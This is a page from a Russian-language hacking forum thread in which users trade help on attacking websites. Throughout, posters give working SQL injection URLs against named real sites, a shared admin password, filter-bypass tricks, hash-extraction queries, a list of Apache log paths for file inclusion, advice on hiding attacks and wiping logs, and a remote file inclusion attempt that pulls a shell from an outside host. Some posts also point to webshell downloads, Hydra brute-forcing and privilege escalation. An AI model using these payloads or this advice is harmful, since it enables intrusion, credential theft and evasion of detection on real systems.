PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

.Slip
18.12.2007, 17:37
У меня целая куча вопросов:
как обходить фильтрацию пробелов в скуле? /**/ не катит.
Как зашифровывать символы, чтобы получилось что-то такое: 0x27 ?
Чем можно примконнектиться к БД, если знаешь логин и пароль (программка клиент есть? откуда скачать?). База Данных - МуСкул.

Всем спасибо кто поможет+++
1. Варианты пробела:
+, %2B, %09, %0D, %0A
2. Mysql Hex, обычное представление информации в шестандцетеричной системе счисления, только добавление к началу 0x. Как вариант, кодировать можно тут:
http://quest.antichat.net/code.php
3. Navicat, погугли и найдёшь.

presidentua
18.12.2007, 17:49
У меня целая куча вопросов:
Как зашифровывать символы, чтобы получилось что-то такое: 0x27 ?
Чем можно примконнектиться к БД, если знаешь логин и пароль (программка клиент есть? откуда скачать?). База Данных - МуСкул.


Начнем с последнего: для конекта можеш использовать MySql-Front, но огорчю тебя наверно 99% случаях запрещают доступ из вне :(, но попробуй может тебе повезет :).

Для помощи в инекции использую прогу от Smersh, маленькая простая и удобная. Попробуй может понравиться. http://slil.ru/25252210 :)
-------------------------
ПС: Сори! .Slip обогнал. плюс ему за скорость :)

AFoST
18.12.2007, 18:13
Нужна помощь в заливке шелла.
Есть доступ к кривой админке. и скуль. Мне просто интересно в образховательных целях что можно сделать дальше, если у кого получится, то выложите здесь подробное описание...

ЗЫ
http://www.kaprikorn-shop.co.uk/index1.php?cat=1&prod=3+union+selecе+1,2,3,4,5,6+from+information_ schema.tables/*

пасс к админке 01041972
Может, кто-то ещё попробует?

Termin@L
18.12.2007, 19:40
можно разделять тремя способами - пробелами, +, и /**/ больше вроде никак
это 16-теричное представление чмсла, 0х впереди это как раз обозначегие, что дальще всё в хекс
коннектиться можно, с помощью разных прог, есть ачатовская, есть mysql client, с помощью пхп скрипта самописного, но всё это лишь в том случае, если разрешено подключаться удалённо

.Slip
18.12.2007, 19:43
можно разделять тремя способами - пробелами, +, и /**/ больше вроде никак
А блядь это я с потолка взял, да?
1. Варианты пробела:
+, %2B, %09, %0D, %0A
=\

.Slip
18.12.2007, 19:48
%09 - табуляция
%0d - возврат коретки
%0А - перевод строки

AFoST
18.12.2007, 19:56
$ifs ещё...

DEMIX
18.12.2007, 21:53
Вопрос такой: я взломал сайт через инъекцию, могут ли админы узнать как я это сделал? Посмотрят в логи и узнают? А если логи стереть?
И еще один вопрос можно ли произвести инъекцию так чтоб админы не узнали(вернее чтоб в логах ничего небыло)?

.Slip
18.12.2007, 23:26
Вопрос такой: я взломал сайт через инъекцию, могут ли админы узнать как я это сделал? Посмотрят в логи и узнают? А если логи стереть?
И еще один вопрос можно ли произвести инъекцию так чтоб админы не узнали(вернее чтоб в логах ничего небыло)?
Могут, все гет запросы логируются. Ёпт, если сотрёшь то не узнают:d Можно и без палева произвести, Постом. Но не всегда это удаётся.

AFoST
18.12.2007, 23:30
.Slip, а пост точно не логируются?

blackybr
18.12.2007, 23:42
пост запросы логируются если стоит апач с модулем mod_security

Red_Red1
18.12.2007, 23:43
Прошу помощи в такой штуке....

http://vip.km.ru/megabook/animal/Encyclop.asp?Topic=Stat_anim_772'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

Конкретно с этим запросом вроде все ясно, но как только иду дальше нифига не выходит. Как инструкцию использую статью Кеша (которая ни разу не подводила) по иньекции в МССКЛ.... Есть подозрение что можно составить запрос правильно и вывести таки все таблицы и столбики и т.д.... но вот КАК.... (а может и ни как).
Расскажите, объясните, мсскл не столь популярна... сам так и не догадался и не нашел инфу?

.Slip
18.12.2007, 23:45
.Slip, а пост точно не логируются?
Логируются, например таким способом:
httpd.conf
<IfModule mod_security.c>
SecAuditEngine On
SecFilterScanPOST On
SecFilterEngine On
</IfModule>
Включает регистрацию пост запросов. Но про такие вещи большинство забывает. Да и при просмотре логов, пост не так бросается в глаза как гет.

blackybr
19.12.2007, 00:46
Red_Red1 ограничение на ввод параметра как я посчитал 84 символа :D

MaksimIsaev
19.12.2007, 02:07
_http://www.svt.vologda.ru/template.asp?file=что угодно, хоть майл ру
Разнообразные ../htpaswd не катят, похоже, что это запрос к базе, а не тупая подстановка имени.
Как бы поточнее определиться с дальнейшими действиями?

ENFIX
19.12.2007, 02:12
Ничего тут не сделаешь, данные из параметра file вставляются в фрейм

MaksimIsaev
19.12.2007, 02:34
Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов?

ENFIX
19.12.2007, 02:43
Может, но тебе будет показываться только сам html
даже если ты смотришь файл config.asp, или еще какой, который просто хранит данные, а ничего не выводит, толку 0.

Конечно можно попробовать поискать какие-либо данные, но наврятли ты их найдешь (и есть ли они)

+toxa+
19.12.2007, 02:45
Нет. Это ифрейм.

159932
19.12.2007, 12:19
как осуществлять скуль если страница кончаеться на ".html" ?

тут наверняка .htaccess помогают но как это обойти ???
сам не знаю - вот у вас решил спросить
также бывает что страница http://www.site.ru/lll/1123.htm выдаёт ошибки sql ...

Player1
19.12.2007, 12:35
как осуществлять скуль если страница кончаеться на ".html" ?

тут наверняка .htaccess помогают но как это обойти ???
сам не знаю - вот у вас решил спросить
также бывает что страница http://www.site.ru/lll/1123.htm выдаёт ошибки sql ...
как я понял там юзаеться mod_rewrite

blackybr
19.12.2007, 14:33
единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать :)

Spyder
19.12.2007, 14:37
Да, но в идеале в этом фрейме может же оказаться содержимое нужных/интересных/ файлов?

С таким же успехом ты можешь просто обратится к ним, например site.ru/.htaccess, вместо site.ru/script.asp?file=.htaccess
Знаешь какой результат будет? =) Вот и у ифрейма тоже самое

159932, там mod_rewrite или в штацессе прописано что то типа
add-type application/x-httpd-php .html

Player1
19.12.2007, 17:42
единственный способ - гугл, если он проиндексировал раньше чем поставили "переписанные ссылки", либо тупо угадать :)
поможет если только сайт не поливался сразу с переписаными ссылкамми :)

Ershik
19.12.2007, 21:50
У меня такой вопрос.
http://www.halbot.ru
Странная форма авторизации.
Я могу авторизоваться по типу: ' or 1=1/* : 1 Сразу появляется левая анкета, я ее не регистрировал.
Так, вот попробовал авторизоваться под админом:
"admin" : 'or 1=1/*
admin'/* : 1
admin'/* : or 1=1/*
Ковырял минут пять но эффекта не добился. В чем я могу ошибаться?

AFoST
19.12.2007, 22:05
попробуй так
1' or login like %admin% /*
Т.е. заходить будет в том случает если логин содержит последовательность символов admin (admin123 SITEadmin RadminR)
За место login может быть что-нибудь другое. Например пароль или мыло или аська....

Ershik
19.12.2007, 22:11
В логине может быть максимум 12 знаков
Пробовал 1' or admin' : 1 не получилось.
Ни кавычки ничего он не съедает, а лишь тупо их пропускает.

Ershik
19.12.2007, 22:12
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.

Эээ..разобрался! :D
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. :rolleyes:

Spyder
19.12.2007, 22:42
на ловушку легко можно проверить подставиви например ' or 999=999/*

AFoST
19.12.2007, 22:43
Я еще подумал, что это ловушка админа ..а нет. пропускает на любой пароль но ' or 1=1/* должен быть обязателен.

Эээ..разобрался! :D
Собственно так. Аккаунта admin там нет.
Но порывшись в комментах и выдернув первый попавшиеся логин я спокойно авторизовался по нему. :rolleyes:
Ну вот, пользуйся на здоровье :) А админа все же найди!

Ershik
20.12.2007, 11:13
Гхм. Нашел.
Админ - halbot
Авторизовался как halbot : 'or 1=1/*
А как ' or 999=999/* Не получилось.
Самое интересное, что когда авторизуюсь под левым ником никакая информация не выскакивает. Один емейл тип zz@zz и все.
Акк админа то есть, но входа в админку там нет.

Tigger
20.12.2007, 21:24
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))

~EviL~
21.12.2007, 02:22
Не могу раскрутить =\ :
Database error with query: [SELECT s1.id as parent_id, s1.title as parent_title FROM sections as s LEFT JOIN sections as s1 on s.parent_id=s1.id WHERE s.id=]: error 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/sinaius2/public_html/evreimir/article.php on line 41
(http://www.evreimir.com/article.php?id=-12032&res=1)

Кроме этого:

http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? :confused:

BlackCats
21.12.2007, 15:28
http://www.tymoshchuk.com/news.php?id=394+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* подобрал пароль и юзера....а вот админку найти не могу....помагите найти плизз))

http://www.tymoshchuk.com/priv/index.php
в админке ни чего интересного..
PS
задефейсиш - запинаю.

Scipio
21.12.2007, 16:26
http://www.evreimir.com/article.php?id=-12032&res=1

у меня вобще не загружается

Кроме этого:

http://www.rudtp.ru/articles.php?id=44+ORDER+BY+7/*
Все норм, а так:
http://www.rudtp.ru/articles.php?id=44+UNION+SELECT+1,2,3,4,5,6,7/*
Ошибка. Почему? :confused:

http://www.rudtp.ru/articles.php?id=44+and+substring(version(),1,1)=3

в третьей ветке не предусмотрено использование конструкции union select

AFoST
22.12.2007, 12:08
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.

Ershik
23.12.2007, 09:30
AFoST /logs/access.log

4Dfx
24.12.2007, 10:21
Подскажите, пожалуйста, пути к логам апача. Где сохраняются параметры refferer, user-agent и др... Чем больше вариантов тем лучше.
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
Вот возможные пути.

DEMIX
24.12.2007, 22:29
Искал на сайте уязвимость и вот что мне выдало:

Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...


Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.

Dr.Z3r0
24.12.2007, 22:40
Искал на сайте уязвимость и вот что мне выдало:

Query: 'SELECT id,id2 FROM forum,player WHERE id=1_id AND id_1=9 ORDER BY is_announce DESC, last_reply_time DESC LIMIT -2570, 10' failed...


Что-то не та ошыбка которая должна быть. Здесь есть уязвимость или нет??? Если да то почему я немогу подобрать таблицу.
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит order by...

DEMIX
24.12.2007, 23:02
Ну если я правильно понял то "-2570"- какой то третий параметр который ты можешь изменять...
Уязвимость есть, но что либо сделать путного ты не сможешь к сожлению так как перед этим стоит group by...

А как можно обойти??

Scipio
24.12.2007, 23:06
никак, почитай форум про инъекцию после limit

DEMIX
25.12.2007, 19:37
ЗЫ А теперь нашел такую ошибку: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in .../free.php on line 78

Таблица не подбирается. Здесь тоже какой-то прикол???

Dr.Z3r0
25.12.2007, 19:58
сейчас я уйду в транс, и пойму что за ссылка, где баг и что ты подставляешь, и поговорив с духами узнаю как правильно составить запрос...

Spyder
25.12.2007, 20:02
хз, я пробовал, не получилось =\

Op3r
25.12.2007, 20:46
такой вопрос нашел SQL инъекцию но тут проблема хэш не полностью виден,
ссылка обрезает, походу не хватает 3х символов
ac34136776f3f1f60c6b4c642...
подаю вот такой запрос
/index.php?kat=-8+union+select+concat(pass)+from+user/*
подскажите каким запросом выдернуть полный хэш
спс за рание

+toxa+
25.12.2007, 20:51
substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length.

в твоём случае надо два запроса делать, например сначала первые 16 символов, потом отсавшиеся 16 символов

ЗЫ concat в твоём запросе не нужен, он служит для "склеивания" строк, а у тебя тут нечего "склеивать"

AFoST
25.12.2007, 21:21
А что если так :)
/index.php?kat=-8+union+select+concat(substring(pass,1,16),substri ng(pass,16,16))+from+user/*

ThreeD
26.12.2007, 04:04
Доброго времени суток, ув. Античатовцы.
Возникло несколько вопросов по sql-inj, следующего содержания:

1). Версия- 5.0.33-log, с помощью table_name и information_schema.tables подобрал необходимое количество таблиц (237 штук!!) и все имена посписывал, с помощью сolumn_name и information_schema.columns подобрал необходимое количество колонок, но их оказалось 1254 единицы!!!! После таблиц, ни сил, ни желания их выводить по одному нет :) -можно ли составить запрос, для вывода всех имен колонок сразу, или есть какой-нить софт, соответствующий теме вопроса? Пните хотя б на статью по теме...

2). В именах таблиц, которые я вывел, нет таблицы mysql.user, но тем не менее она присутствует, из неё я вывел имя пользователя REPLOTAGE и пассворд вида: *977C2D1B79842769D627EBFAC5AA07D04F40EBC0
Именно так, со звёздочкой в начале. :)
Подскажите, это MD5 хеш или что другое, и как его расшифровать, т.к. в скулях я новичёк и заинтересовался ими менее недели назад. Все найденные он-лайн тулзы по расшифровке не дали никакого результата, либо писали, что не правильный формат функции. Соответственно данный аспект мне крайне интересен ...

3). Среди тех имён таблиц, что я вывел, при запросе к ним с помощью +from+, они все выдают ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in тратата on line 531. Хотя там есть и accounts и user и users и administrations, в общем все необходимые и полезные таблицы. Пробовал в верхнем и нижнем регистре, результат тот же. Ошибка та же, стандартная. Побуквенно переключать регистр не пробовал, и так запарился с таблицами и колонками :) .Но имена то вывел, и acess denied не пишет...В чём же дело? К mysql.user, к примеру, подходит нормально, выводит из неё, и с +from+ ошибку не выдаёт...

Чё то хотел ещё спросить, но забыл. :) В общем, заранее благодарен за Ваш совет.
С ув. ThreeD

fRg
26.12.2007, 08:12
Для ThreeD

1) и 3) : нет конкретной ссылки - нет конкретного ответа!
2) Это SHA-1 - алгоритм (PasswordsPro юзай!) и пусть * тебя не смущает!

n0ne
26.12.2007, 10:50
ThreeD, fRg, этот хэш - MySQL5. Давно MySQL шифрует свои пассы в SHA-1?

ThreeD
26.12.2007, 13:49
ThreeD, fRg, этот хэш - MySQL5.
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD

Dr.Z3r0
26.12.2007, 14:56
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD
юзай passwordpro ;)

Nea7
26.12.2007, 15:01
Благодарен за ответ, но вопрос остался актуален, где или чем расшифровать данный хеш?
С ув. ThreeD

Что на вопросы по sql-inj, что на этот можно найти ответы просмотрев несколько тем на форуме. ты кроме этой темы другие не видешь?

Dr.Z3r0
26.12.2007, 15:03
Доброго времени суток, ув. Античатовцы.
Возникло несколько вопросов по sql-inj, следующего содержания:

1). Версия- 5.0.33-log, с помощью table_name и information_schema.tables подобрал необходимое количество таблиц (237 штук!!) и все имена посписывал, с помощью сolumn_name и information_schema.columns подобрал необходимое количество колонок, но их оказалось 1254 единицы!!!! После таблиц, ни сил, ни желания их выводить по одному нет :) -можно ли составить запрос, для вывода всех имен колонок сразу, или есть какой-нить софт, соответствующий теме вопроса? Пните хотя б на статью по теме...

2). В именах таблиц, которые я вывел, нет таблицы mysql.user, но тем не менее она присутствует, из неё я вывел имя пользователя REPLOTAGE и пассворд вида: *977C2D1B79842769D627EBFAC5AA07D04F40EBC0
Именно так, со звёздочкой в начале. :)
Подскажите, это MD5 хеш или что другое, и как его расшифровать, т.к. в скулях я новичёк и заинтересовался ими менее недели назад. Все найденные он-лайн тулзы по расшифровке не дали никакого результата, либо писали, что не правильный формат функции. Соответственно данный аспект мне крайне интересен ...

3). Среди тех имён таблиц, что я вывел, при запросе к ним с помощью +from+, они все выдают ошибку . Хотя там есть и accounts и user и users и administrations, в общем все необходимые и полезные таблицы. Пробовал в верхнем и нижнем регистре, результат тот же. Ошибка та же, стандартная. Побуквенно переключать регистр не пробовал, и так запарился с таблицами и колонками :) .Но имена то вывел, и acess denied не пишет...В чём же дело? К mysql.user, к примеру, подходит нормально, выводит из неё, и с +from+ ошибку не выдаёт...

Чё то хотел ещё спросить, но забыл. :) В общем, заранее благодарен за Ваш совет.
С ув. ThreeD

вообщем так по пунктам...
1) Лезь в статьи-SQL inj полный фак- в конце найдешь скрипт на пхп для дампа по одному полю... зовецо вроде как для вывода через limit... там не сложно
2)это я написал выше...
3)Когда же вы научитесь смотреть имя БД в которой находицо таблица?... Создай запрос типа SELECT TABLE_SCHEMA FROM INFORMATON_SCHEMA.TABLES WHERE TABLE_NAME='accounts'
и следующий запрос будет типаSELECT [имя столбца из этой таблицы] FROM [то что ты получишь из первого запроса].accounts

ThreeD
26.12.2007, 15:08
Уже определился, всем благодарен за ответы.
2 I-I()/Ib

Отдельное спасибо, не без Вашей помощи ;) Вам +. Ещё раз благодарю.


2 Nea7

Для того, чтобы что-то найти, надо знать что ищеш. До некоторых нюансов, в коих меня, благо, просвятили-что искать, а уж тем более где, я и понятия не имел.Нашёл тему с подходящей тематикой и названием, и раз уж начал здесь задавать вопросы-то старался придерживаться темы, дабы не метаться по всему форуму.Надеюсь, моя позиция ясна? :)

С ув. ThreeD

Nea7
26.12.2007, 15:21
2 Nea7

Для того, чтобы что-то найти, надо знать что ищеш. До некоторых нюансов, в коих меня, благо, просвятили-что искать, а уж тем более где, я и понятия не имел.Нашёл тему с подходящей тематикой и названием, и раз уж начал здесь задавать вопросы-то старался придерживаться темы, дабы не метаться по всему форуму.Надеюсь, моя позиция ясна? :)

С ув. ThreeD

если для тебя просмотреть пару тем - это метаться по форуму, то уж извини =\ дабы облегчить твои метания вот держи брошюрку (http://slil.ru/25289116)

Calcutta
27.12.2007, 00:55
Сайт селан на вордпрессе, дабы облегчить себе поиски просканил его xSpider'ом, нашел скуль инъекциюв виде http://site.ru/?p=1' . выдает результат как с ковычкой, так и без нее:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY post_date ASC LIMIT 1' at line 1]
SELECT ID, post_title FROM wp_posts WHERE post_date > '' AND post_type = 'post' AND post_status = 'publish' AND ID != ORDER BY post_date ASC LIMIT 1
пробнул всеми стандартными методами - ничего не вышло.. если у кого был опыт лома вордпресса в пм plz, плюсиком не обижу ;)
з.ы. мож есть у кого сплоит под Quagga ? :)

lexa007
27.12.2007, 14:06
Подскажите плиз где можно скачать шелл ? а то в поиске не могу найти, не знаю может не так набираю.

min7
27.12.2007, 15:32
Какой именно шелл тебе нужен, а то их много?)
DВот например шелл от команды рст скачать (http://dump.ru/files/n/n762315/)

DEMIX
27.12.2007, 19:21
У меня такой вопрос: я залил на сайт шелл(C99madShell v. 2.0 madnet edition), могу только скачиват файлы. Закачивать могу только в одну папку "images". В другие папки не закачивает. Не могу изменить chmod. Насколько я понимаю у меня нет прав ы на запись или есть еще какая-то проблема??? Если у меня нет прав на запись, то как можно их получить???

Dr.Z3r0
27.12.2007, 20:07
Ищи сплоенты под товою ось для локального поднятия прав как вариант ;)

Scipio
27.12.2007, 20:13
точно не скажу, но помоему в маднетовском шелле бага такая, что файлы он заливает в туже папку где и шелл, а права для записи скорее всего есть у фтп-пользователя ищи конфиги для работы с БД, находи в них пароли от БД и пробуй эти пароли на фтп или ssh

Ershik
28.12.2007, 22:06
В форуме ipb версии 1.3 finall залил через "Загрузка нового стиля" шелл.
Теперь не могу его найти. Система говорит, что он есть, а по адресу sait.ru/Skin/shell.php его нет.
Куда могла его импотировать система?

Op3r
29.12.2007, 16:29
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?

ElteRUS
29.12.2007, 16:35
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?

Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+us er+limit+0,1/*

вывод будет логин/хеш

или так
index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+ limit+0,1/*

вывод будет такой же

Girsoft
29.12.2007, 19:00
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?

Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?

~EviL~
29.12.2007, 22:29
У меня какая-то херня получается с 1 сайтом:
http://www.verticalworld.net/school/program.php?id=6'
Если сделать так:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37/*
Не получается, а если так:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38/*
Получается еще неправильней. Что делать? :confused:

Calcutta
29.12.2007, 22:35
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?

Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?

Бруть с помощью Hydra фтп, е-маилы и т.д. вижео по использованию выложено здесь, поюзай поиск.

Scipio
29.12.2007, 22:55
2~EviL~

есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть)

1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный:
SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7/*

но потом $id (и твой запрос соответственно) передается во второй запрос:
2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем
SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7/*
неправильный запрос, для правильного запроса надо было бы указать:
$id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак

~EviL~
29.12.2007, 23:05
Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL:
http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version--
Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)

Scipio
29.12.2007, 23:14
Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)

~EviL~
29.12.2007, 23:18
Ладно, сегодня явно не мой день :D Остается надеяться на завтрашний ))

HedgeH0g.trj
30.12.2007, 15:12
Вот нашел что-то
*******.ru/index.php?page=viewcom&newscode='
Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2 Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5 Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5 01.01.70 03:00 Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6
Это php-include? может что-то другое или вообще уязвимости нет..?

blackybr
30.12.2007, 15:14
скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00

HedgeH0g.trj
30.12.2007, 15:24
просто после кавычки?

bul.666
30.12.2007, 15:25
просто после кавычки?
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00

HedgeH0g.trj
30.12.2007, 15:26
скиньте ссылку на шелл плз
короче может на живом примере что-то увидите))
_http://inquizition.ru/index.php?page=viewcom&newscode='

Scipio
30.12.2007, 15:30
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00

Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет)

а вовторых перед параметром в fopen добавляется 'news/'

если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы

HedgeH0g.trj
30.12.2007, 15:48
Так что, здесь нифига не выйдет?

Scipio
30.12.2007, 15:53
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется

HedgeH0g.trj
30.12.2007, 16:12
посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
жопа, блин...сори

DEMIX
31.12.2007, 00:55
tar cvfz file.tgz /path/

Обьясните как этой командой пользоватся.
Что такое cvfz, /path/

Можно ли какой-то командой заархивировать папку с вложеными файлами?
Или может есть какой-то шелл который выкачивает целые папки???

Scipio
31.12.2007, 01:16
Тут все просто tar - программа для архивирования файлов
опция c - говорит что нужно создать архив
опция v - говорит что нужно показать процесс создания
опция f - задает имя файла (file.tgz в твоем случае)
опция z - говорит что нужно сначала сжать файлы, а потом заархивировать (без нее сжатия не будет, а будет просто архивирование)
/path/- это путь до папки которую хочешь заархивировать

o3,14um
31.12.2007, 04:37
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/

Piflit
31.12.2007, 04:46
Неудаётся произвести иньекцию... Помогите ребята.
вот ссылка
_http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1
а вот админка
http://www.bhv.ru/admin/
это хорошее издательство... не надо...

o3,14um
31.12.2007, 04:55
это хорошее издательство... не надо...
да я же и не спорю, сам их книги покупаю и на одной из них наткнулся на сайт. Эт так... Спортивный интерес. Потом конечно админам сообщу о баге, а пока интересно проинжектить

Scipio
31.12.2007, 06:08
Имхо не выйдет у тебя ничего, в ibase очень мало встроенных функций, я мало знаком с interbase но помоему там подобия substring нет (покрайней мере substring надо объявлять DECLARE), т.е. посимвольного перебора неполучится, еслиб была возможность посимвольного перебора можно бы было сделать примерно так:
http://www.bhv.ru/books/boa.php?id=176924+and+SUBSTRING((SELECT+RDB$OWNER_ NAME+FROM+RDB$ROLES)+1+FOR+1)='U'
а пока можно довольствоваться только этим:
http://www.bhv.ru/books/boa.php?id=176924+and+1=1

я могу и ошибаться, так как с IB знаком мало

Spyder
31.12.2007, 13:29
омфг, наткнулся я как то на интербейз, почитал маны.... мой тебе совет забить накуй, ибо там каждый столбец имеет определённый тип данных, и хер ты переведёшь их =\ Хотя там так же юнион селект работает, ну у меня работал =\ Но вот с типами напряг, там даже null не прокатит

blackybr
01.01.2008, 18:17
ибо там каждый столбец имеет определённый тип данных

О_о

во всех рсубд каждый столбец имеет определенный тип данных))) в том же мускуле их от 25 до 30 (точно не помню). Просто мускул он более демократичный из-за непривиредливости к выводу данных другого типа

Taylorith
03.01.2008, 05:53
Дарова люди , есть вопрос седня покапался в одном сайте и нашел вот что

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Íåäîïóñòèìîå èìÿ ñòîëáöà "undefined".

/services-list.asp, line 34


Íåäîïóñòèìîå èìÿ ñòîëáöà - вот это что

вот каким образом я получил то что выше находится
https://site.ru/services-list.asp?id=9'

вприцнипе думаю все понятно )))

проблема в том что дальше как мне действовать?? можно ли поиметь из этого что нить выгодное для меня )) спасибо!

delay(0)
03.01.2008, 09:26
как мне действовать??
http://forum.antichat.ru/thread30501.html

Taylorith
03.01.2008, 09:31
спасибо то есть тут вполне возможно осуществить атакУ?

n0ne
03.01.2008, 09:44
Taylorith, не факт

Taylorith
03.01.2008, 09:44
еще нашел кое что


Невозможно выполнить запрос к базе данных.
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /opt/site/trunk/htdocs/tv_channels.php on line 85
Описание канала не найдено.
